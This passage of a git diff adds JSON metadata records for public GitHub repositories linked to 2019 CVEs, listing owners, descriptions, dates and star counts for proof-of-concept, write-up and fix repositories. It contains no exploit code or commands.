+1,33 @@ +[ + { + "id": 175870594, + "name": "cve-2019-9194", + "full_name": "cved-sources\/cve-2019-9194", + "owner": { + "login": "cved-sources", + "id": 46423677, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46423677?v=4", + "html_url": "https:\/\/github.com\/cved-sources", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cved-sources\/cve-2019-9194", + "description": "cve-2019-9194", + "fork": false, + "created_at": "2019-03-15T18:16:27Z", + "updated_at": "2021-04-15T22:57:07Z", + "pushed_at": "2021-04-15T22:57:05Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-9202.json b/2019/CVE-2019-9202.json new file mode 100644 index 0000000000..93964ad9a2 --- /dev/null +++ b/2019/CVE-2019-9202.json @@ -0,0 +1,33 @@ +[ + { + "id": 182127433, + "name": "CVE-2019-9202", + "full_name": "polict\/CVE-2019-9202", + "owner": { + "login": "polict", + "id": 18173936, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18173936?v=4", + "html_url": "https:\/\/github.com\/polict", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/polict\/CVE-2019-9202", + "description": "Nagios IM 2.6 remote code execution exploit: CSRF + SQLi + RCE + LPE --> remote root", + "fork": false, + "created_at": "2019-04-18T17:09:26Z", + "updated_at": "2024-02-09T14:21:25Z", + "pushed_at": "2019-04-18T17:18:40Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-9465.json b/2019/CVE-2019-9465.json new file mode 100644 index 0000000000..c1a879baf1 --- /dev/null +++ b/2019/CVE-2019-9465.json @@ -0,0 +1,64 @@ +[ + { + "id": 241634998, + "name": "CVE-2019-9465", + "full_name": "alexbakker\/CVE-2019-9465", + "owner": { + "login": "alexbakker", + "id": 2387841, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2387841?v=4", + "html_url": "https:\/\/github.com\/alexbakker", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/alexbakker\/CVE-2019-9465", + "description": "Demo Android application for CVE-2019-9465", + "fork": false, + "created_at": "2020-02-19T13:57:11Z", + "updated_at": "2024-01-16T16:26:24Z", + "pushed_at": "2020-02-19T13:57:29Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 7, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 445941803, + "name": "CVE-2019-9465", + "full_name": "MichaelsPlayground\/CVE-2019-9465", + "owner": { + "login": "MichaelsPlayground", + "id": 92245023, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/92245023?v=4", + "html_url": "https:\/\/github.com\/MichaelsPlayground", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MichaelsPlayground\/CVE-2019-9465", + "description": null, + "fork": false, + "created_at": "2022-01-08T22:25:43Z", + "updated_at": "2022-01-08T22:25:51Z", + "pushed_at": "2022-01-08T22:25:48Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-9506.json b/2019/CVE-2019-9506.json new file mode 100644 index 0000000000..a6781dc6e2 --- /dev/null +++ b/2019/CVE-2019-9506.json @@ -0,0 +1,43 @@ +[ + { + "id": 202532520, + "name": "knob", + "full_name": "francozappa\/knob", + "owner": { + "login": "francozappa", + "id": 4628017, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4628017?v=4", + "html_url": "https:\/\/github.com\/francozappa", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/francozappa\/knob", + "description": "Key Negotiation Of Bluetooth (KNOB) attacks on Bluetooth BR\/EDR and BLE [CVE-2019-9506]", + "fork": false, + "created_at": "2019-08-15T11:54:21Z", + "updated_at": "2024-11-25T13:22:49Z", + "pushed_at": "2022-04-04T15:16:08Z", + "stargazers_count": 178, + "watchers_count": 178, + "has_discussions": false, + "forks_count": 38, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "ble", + "bluetooth", + "encryption", + "entropy", + "knob", + "knobattack", + "lmp", + "security", + "wireless" + ], + "visibility": "public", + "forks": 38, + "watchers": 178, + "score": 0, + "subscribers_count": 13 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-9511.json b/2019/CVE-2019-9511.json new file mode 100644 index 0000000000..54cd5162a3 --- /dev/null +++ b/2019/CVE-2019-9511.json @@ -0,0 +1,33 @@ +[ + { + "id": 323590787, + "name": "ingress-nginx-0.21-1.19.5", + "full_name": "flyniu666\/ingress-nginx-0.21-1.19.5", + "owner": { + "login": "flyniu666", + "id": 52430647, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52430647?v=4", + "html_url": "https:\/\/github.com\/flyniu666", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/flyniu666\/ingress-nginx-0.21-1.19.5", + "description": "based on nginx 1.19.5 to fix for CVE-2018-16843, CVE-2018-16844, CVE-2019-9511, CVE-2019-9513, and CVE-2019-9516", + "fork": false, + "created_at": "2020-12-22T10:16:11Z", + "updated_at": "2020-12-23T11:45:29Z", + "pushed_at": "2020-12-23T11:45:24Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-9580.json b/2019/CVE-2019-9580.json new file mode 100644 index 0000000000..e6bada43e2 --- /dev/null +++ b/2019/CVE-2019-9580.json @@ -0,0 +1,35 @@ +[ + { + "id": 175478558, + "name": "CVE-2019-9580", + "full_name": "mpgn\/CVE-2019-9580", + "owner": { + "login": "mpgn", + "id": 5891788, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5891788?v=4", + "html_url": "https:\/\/github.com\/mpgn", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mpgn\/CVE-2019-9580", + "description": "CVE-2019-9580 - StackStorm: exploiting CORS misconfiguration (null origin) to gain RCE", + "fork": false, + "created_at": "2019-03-13T18:37:18Z", + "updated_at": "2024-08-24T12:19:58Z", + "pushed_at": "2019-03-13T19:26:27Z", + "stargazers_count": 32, + "watchers_count": 32, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "stackstorm" + ], + "visibility": "public", + "forks": 4, + "watchers": 32, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-9596.json b/2019/CVE-2019-9596.json new file mode 100644 index 0000000000..2e85ba3475 --- /dev/null +++ b/2019/CVE-2019-9596.json @@ -0,0 +1,33 @@ +[ + { + "id": 187840640, + "name": "CVE-2019-9596-and-CVE-2019-9597", + "full_name": "gerwout\/CVE-2019-9596-and-CVE-2019-9597", + "owner": { + "login": "gerwout", + "id": 975427, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/975427?v=4", + "html_url": "https:\/\/github.com\/gerwout", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gerwout\/CVE-2019-9596-and-CVE-2019-9597", + "description": "Darktrace CSRF exploit ", + "fork": false, + "created_at": "2019-05-21T13:14:43Z", + "updated_at": "2024-01-02T20:37:48Z", + "pushed_at": "2019-05-24T11:49:04Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-9599.json b/2019/CVE-2019-9599.json new file mode 100644 index 0000000000..d2485866ee --- /dev/null +++ b/2019/CVE-2019-9599.json @@ -0,0 +1,33 @@ +[ + { + "id": 169823560, + "name": "AirDroidPwner", + "full_name": "s4vitar\/AirDroidPwner", + "owner": { + "login": "s4vitar", + "id": 40530440, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40530440?v=4", + "html_url": "https:\/\/github.com\/s4vitar", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/s4vitar\/AirDroidPwner", + "description": "Programa ideal para robar toda la información de un dispositivo remotamente a través de la aplicación AirDroid. [CVE-2019-9599] (https:\/\/www.exploit-db.com\/exploits\/46337)", + "fork": false, + "created_at": "2019-02-09T02:18:37Z", + "updated_at": "2024-11-11T05:05:35Z", + "pushed_at": "2019-11-03T17:29:56Z", + "stargazers_count": 56, + "watchers_count": 56, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 56, + "score": 0, + "subscribers_count": 4 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-9621.json b/2019/CVE-2019-9621.json new file mode 100644 index 0000000000..ab96a03290 --- /dev/null +++ b/2019/CVE-2019-9621.json @@ -0,0 +1,45 @@ +[ + { + "id": 185226722, + "name": "ZimbraExploit", + "full_name": "k8gege\/ZimbraExploit", + "owner": { + "login": "k8gege", + "id": 42312878, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42312878?v=4", + "html_url": "https:\/\/github.com\/k8gege", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/k8gege\/ZimbraExploit", + "description": "Zimbra邮件系统漏洞 XXE\/RCE\/SSRF\/Upload GetShell Exploit 1. (CVE-2019-9621 Zimbra<8.8.11 XXE GetShell Exploit)", + "fork": false, + "created_at": "2019-05-06T15:47:20Z", + "updated_at": "2024-08-12T19:48:39Z", + "pushed_at": "2023-02-22T06:59:34Z", + "stargazers_count": 73, + "watchers_count": 73, + "has_discussions": false, + "forks_count": 41, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "0day", + "cve-2019-9621", + "exploit", + "getshell", + "k8cscan", + "poc", + "rce", + "ssrf", + "upload", + "xxe", + "zimbra" + ], + "visibility": "public", + "forks": 41, + "watchers": 73, + "score": 0, + "subscribers_count": 4 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-9653.json b/2019/CVE-2019-9653.json new file mode 100644 index 0000000000..6c527cad51 --- /dev/null +++ b/2019/CVE-2019-9653.json @@ -0,0 +1,33 @@ +[ + { + "id": 175789235, + "name": "CVE-2019-9653", + "full_name": "grayoneday\/CVE-2019-9653", + "owner": { + "login": "grayoneday", + "id": 28929076, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/28929076?v=4", + "html_url": "https:\/\/github.com\/grayoneday", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/grayoneday\/CVE-2019-9653", + "description": null, + "fork": false, + "created_at": "2019-03-15T09:27:15Z", + "updated_at": "2019-03-15T09:32:42Z", + "pushed_at": "2019-03-15T09:32:41Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-9670.json b/2019/CVE-2019-9670.json new file mode 100644 index 0000000000..0e68950d39 --- /dev/null +++ b/2019/CVE-2019-9670.json @@ -0,0 +1,224 @@ +[ + { + "id": 202659145, + "name": "Zimbra-RCE", + "full_name": "rek7\/Zimbra-RCE", + "owner": { + "login": "rek7", + "id": 25335191, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25335191?v=4", + "html_url": "https:\/\/github.com\/rek7", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rek7\/Zimbra-RCE", + "description": "Zimbra RCE PoC - CVE-2019-9670 XXE\/SSRF", + "fork": false, + "created_at": "2019-08-16T04:37:11Z", + "updated_at": "2024-11-02T03:19:22Z", + "pushed_at": "2019-08-16T05:54:16Z", + "stargazers_count": 22, + "watchers_count": 22, + "has_discussions": false, + "forks_count": 14, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "exploit", + "python", + "rce", + "zimbra" + ], + "visibility": "public", + "forks": 14, + "watchers": 22, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 202751712, + "name": "Zimbra-RCE", + "full_name": "attackgithub\/Zimbra-RCE", + "owner": { + "login": "attackgithub", + "id": 45205753, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45205753?v=4", + "html_url": "https:\/\/github.com\/attackgithub", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/attackgithub\/Zimbra-RCE", + "description": "Zimbra RCE CVE-2019-9670", + "fork": false, + "created_at": "2019-08-16T15:22:27Z", + "updated_at": "2019-08-17T01:04:11Z", + "pushed_at": "2019-08-16T05:54:16Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 508438071, + "name": "arbimz", + "full_name": "oppsec\/arbimz", + "owner": { + "login": "oppsec", + "id": 50470310, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50470310?v=4", + "html_url": "https:\/\/github.com\/oppsec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/oppsec\/arbimz", + "description": "🔥 Arbimz is a python tool created to exploit the vulnerability on Zimbra assigned as CVE-2019-9670.", + "fork": false, + "created_at": "2022-06-28T20:01:11Z", + "updated_at": "2024-08-12T20:24:35Z", + "pushed_at": "2022-07-22T19:01:26Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "2019", + "cve", + "cve-2019-9670", + "exploit", + "offsec", + "pentest", + "poc", + "python", + "python3", + "rce", + "redteam", + "ssrf", + "xxe", + "zimbra" + ], + "visibility": "public", + "forks": 2, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 524815430, + "name": "zaber", + "full_name": "oppsec\/zaber", + "owner": { + "login": "oppsec", + "id": 50470310, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50470310?v=4", + "html_url": "https:\/\/github.com\/oppsec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/oppsec\/zaber", + "description": "🕵️ Yet another CVE-2019-9670 exploit, but in Golang.", + "fork": false, + "created_at": "2022-08-15T00:54:44Z", + "updated_at": "2024-08-12T20:26:12Z", + "pushed_at": "2022-09-05T14:46:11Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "blueteam", + "cve", + "cve-2019-9670", + "exploit", + "go", + "golang", + "redteam", + "vulnerability", + "zimbra" + ], + "visibility": "public", + "forks": 2, + "watchers": 4, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 791278770, + "name": "CVE-2019-9670", + "full_name": "Cappricio-Securities\/CVE-2019-9670", + "owner": { + "login": "Cappricio-Securities", + "id": 102907425, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102907425?v=4", + "html_url": "https:\/\/github.com\/Cappricio-Securities", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Cappricio-Securities\/CVE-2019-9670", + "description": "mailboxd component in Synacor Zimbra Collaboration Suite 8.7.x before 8.7.11p10 has an XML External Entity injection (XXE) vulnerability, as demonstrated by Autodiscover\/Autodiscover.xml.", + "fork": false, + "created_at": "2024-04-24T12:32:18Z", + "updated_at": "2024-06-21T07:15:21Z", + "pushed_at": "2024-06-21T07:10:37Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2019-9670", + "xxe", + "zcs", + "zimbra" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 796114018, + "name": "CVE-2019-9670-DtdFilegeneration", + "full_name": "OracleNep\/CVE-2019-9670-DtdFilegeneration", + "owner": { + "login": "OracleNep", + "id": 159681973, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/159681973?v=4", + "html_url": "https:\/\/github.com\/OracleNep", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/OracleNep\/CVE-2019-9670-DtdFilegeneration", + "description": null, + "fork": false, + "created_at": "2024-05-05T01:09:02Z", + "updated_at": "2024-05-07T00:35:50Z", + "pushed_at": "2024-05-05T01:15:43Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-9673.json b/2019/CVE-2019-9673.json new file mode 100644 index 0000000000..57969c4ad1 --- /dev/null +++ b/2019/CVE-2019-9673.json @@ -0,0 +1,33 @@ +[ + { + "id": 175058439, + "name": "CVE-2019-9673", + "full_name": "mgrube\/CVE-2019-9673", + "owner": { + "login": "mgrube", + "id": 90159, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/90159?v=4", + "html_url": "https:\/\/github.com\/mgrube", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mgrube\/CVE-2019-9673", + "description": "Writeup", + "fork": false, + "created_at": "2019-03-11T18:16:15Z", + "updated_at": "2019-08-08T16:04:30Z", + "pushed_at": "2019-03-24T08:21:37Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-9729.json b/2019/CVE-2019-9729.json new file mode 100644 index 0000000000..8eb4f90231 --- /dev/null +++ b/2019/CVE-2019-9729.json @@ -0,0 +1,126 @@ +[ + { + "id": 175226868, + "name": "SdoKeyCrypt-sys-local-privilege-elevation", + "full_name": "HyperSine\/SdoKeyCrypt-sys-local-privilege-elevation", + "owner": { + "login": "HyperSine", + "id": 58699351, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/58699351?v=4", + "html_url": "https:\/\/github.com\/HyperSine", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/HyperSine\/SdoKeyCrypt-sys-local-privilege-elevation", + "description": "CVE-2019-9729. Transferred from https:\/\/github.com\/DoubleLabyrinth\/SdoKeyCrypt-sys-local-privilege-elevation", + "fork": false, + "created_at": "2019-03-12T14:18:20Z", + "updated_at": "2024-08-12T19:46:40Z", + "pushed_at": "2019-03-13T01:24:21Z", + "stargazers_count": 83, + "watchers_count": 83, + "has_discussions": false, + "forks_count": 29, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 29, + "watchers": 83, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 422925602, + "name": "HyperSine", + "full_name": "timeowilliamsq\/HyperSine", + "owner": { + "login": "timeowilliamsq", + "id": 93442424, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/93442424?v=4", + "html_url": "https:\/\/github.com\/timeowilliamsq", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/timeowilliamsq\/HyperSine", + "description": "CVE-2019-9729. Transferred from https:\/\/github.com\/DoubleLabyrinth\/SdoKeyCrypt-sys-local-privilege-elevation", + "fork": false, + "created_at": "2021-10-30T15:56:37Z", + "updated_at": "2021-10-30T15:56:37Z", + "pushed_at": "2021-10-30T15:56:38Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 497049358, + "name": "HyperSine", + "full_name": "recozone\/HyperSine", + "owner": { + "login": "recozone", + "id": 106395376, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/106395376?v=4", + "html_url": "https:\/\/github.com\/recozone", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/recozone\/HyperSine", + "description": "CVE-2019-9729. Transferred from https:\/\/github.com\/DoubleLabyrinth\/SdoKeyCrypt-sys-local-privilege-elevation", + "fork": false, + "created_at": "2022-05-27T15:34:39Z", + "updated_at": "2022-05-27T15:34:39Z", + "pushed_at": "2022-05-27T15:34:40Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 508749189, + "name": "HyperSine", + "full_name": "huangyutange0uywlcn\/HyperSine", + "owner": { + "login": "huangyutange0uywlcn", + "id": 108419013, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/108419013?v=4", + "html_url": "https:\/\/github.com\/huangyutange0uywlcn", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/huangyutange0uywlcn\/HyperSine", + "description": "CVE-2019-9729. Transferred from https:\/\/github.com\/DoubleLabyrinth\/SdoKeyCrypt-sys-local-privilege-elevation", + "fork": false, + "created_at": "2022-06-29T15:33:05Z", + "updated_at": "2022-06-29T15:33:05Z", + "pushed_at": "2022-06-29T15:33:05Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-9730.json b/2019/CVE-2019-9730.json new file mode 100644 index 0000000000..bd39d18d74 --- /dev/null +++ b/2019/CVE-2019-9730.json @@ -0,0 +1,33 @@ +[ + { + "id": 181268125, + "name": "CVE-2019-9730", + "full_name": "jthuraisamy\/CVE-2019-9730", + "owner": { + "login": "jthuraisamy", + "id": 5413071, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5413071?v=4", + "html_url": "https:\/\/github.com\/jthuraisamy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jthuraisamy\/CVE-2019-9730", + "description": "Synaptics Audio Driver LPE", + "fork": false, + "created_at": "2019-04-14T06:16:34Z", + "updated_at": "2024-10-21T10:37:37Z", + "pushed_at": "2019-04-15T11:17:39Z", + "stargazers_count": 35, + "watchers_count": 35, + "has_discussions": false, + "forks_count": 13, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 13, + "watchers": 35, + "score": 0, + "subscribers_count": 4 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-9745.json b/2019/CVE-2019-9745.json new file mode 100644 index 0000000000..aeb420dbc1 --- /dev/null +++ b/2019/CVE-2019-9745.json @@ -0,0 +1,33 @@ +[ + { + "id": 215005621, + "name": "CVE-2019-9745", + "full_name": "KPN-CISO\/CVE-2019-9745", + "owner": { + "login": "KPN-CISO", + "id": 6069290, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6069290?v=4", + "html_url": "https:\/\/github.com\/KPN-CISO", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/KPN-CISO\/CVE-2019-9745", + "description": "Write-up on the CVE-2019-9745 vulnerability.", + "fork": false, + "created_at": "2019-10-14T09:44:44Z", + "updated_at": "2019-11-07T14:36:56Z", + "pushed_at": "2019-11-07T14:36:54Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 5 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-9766.json b/2019/CVE-2019-9766.json new file mode 100644 index 0000000000..c99580bbc8 --- /dev/null +++ b/2019/CVE-2019-9766.json @@ -0,0 +1,64 @@ +[ + { + "id": 196796828, + "name": "CVE-2019-9766", + "full_name": "moonheadobj\/CVE-2019-9766", + "owner": { + "login": "moonheadobj", + "id": 52202409, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52202409?v=4", + "html_url": "https:\/\/github.com\/moonheadobj", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/moonheadobj\/CVE-2019-9766", + "description": "CVE-2019-9766 React", + "fork": false, + "created_at": "2019-07-14T05:18:02Z", + "updated_at": "2020-03-08T03:49:16Z", + "pushed_at": "2020-03-07T04:22:04Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 536381949, + "name": "CVE-2019-9766", + "full_name": "zeronohacker\/CVE-2019-9766", + "owner": { + "login": "zeronohacker", + "id": 65578786, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/65578786?v=4", + "html_url": "https:\/\/github.com\/zeronohacker", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/zeronohacker\/CVE-2019-9766", + "description": "Free MP3 CD Ripper 2.6 版本中存在栈缓冲区溢出漏洞 (CVE-2019-9766),远程攻击者可借助特制的 .mp3 文件利用该漏洞执行任意代码。", + "fork": false, + "created_at": "2022-09-14T02:19:57Z", + "updated_at": "2022-09-15T01:12:55Z", + "pushed_at": "2022-09-14T02:24:38Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-9787.json b/2019/CVE-2019-9787.json new file mode 100644 index 0000000000..530322ab5a --- /dev/null +++ b/2019/CVE-2019-9787.json @@ -0,0 +1,188 @@ +[ + { + "id": 181409411, + "name": "cve-2019-9787_csrf_poc", + "full_name": "rkatogit\/cve-2019-9787_csrf_poc", + "owner": { + "login": "rkatogit", + "id": 40052696, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40052696?v=4", + "html_url": "https:\/\/github.com\/rkatogit", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rkatogit\/cve-2019-9787_csrf_poc", + "description": null, + "fork": false, + "created_at": "2019-04-15T03:59:44Z", + "updated_at": "2021-06-28T18:18:18Z", + "pushed_at": "2019-04-15T04:13:30Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 2, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 202961104, + "name": "CodePath_Week_7-8", + "full_name": "PalmTreeForest\/CodePath_Week_7-8", + "owner": { + "login": "PalmTreeForest", + "id": 30913112, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/30913112?v=4", + "html_url": "https:\/\/github.com\/PalmTreeForest", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/PalmTreeForest\/CodePath_Week_7-8", + "description": "CodePath Assignment for Weeks 7 & 8: CVE-2017-14719, CVE-2019-9787 & Unauthenticated Page\/Post Content Modification via REST API", + "fork": false, + "created_at": "2019-08-18T04:50:37Z", + "updated_at": "2019-08-18T05:22:44Z", + "pushed_at": "2019-08-18T05:18:56Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 260468975, + "name": "Wordpress_cve-2019-9787_defense", + "full_name": "sijiahi\/Wordpress_cve-2019-9787_defense", + "owner": { + "login": "sijiahi", + "id": 42769949, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42769949?v=4", + "html_url": "https:\/\/github.com\/sijiahi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sijiahi\/Wordpress_cve-2019-9787_defense", + "description": "This is a recurrence of cve-2019-9787 on Wordpress and a hash-based defense.", + "fork": false, + "created_at": "2020-05-01T13:44:10Z", + "updated_at": "2022-08-09T15:02:53Z", + "pushed_at": "2021-06-21T03:46:16Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": 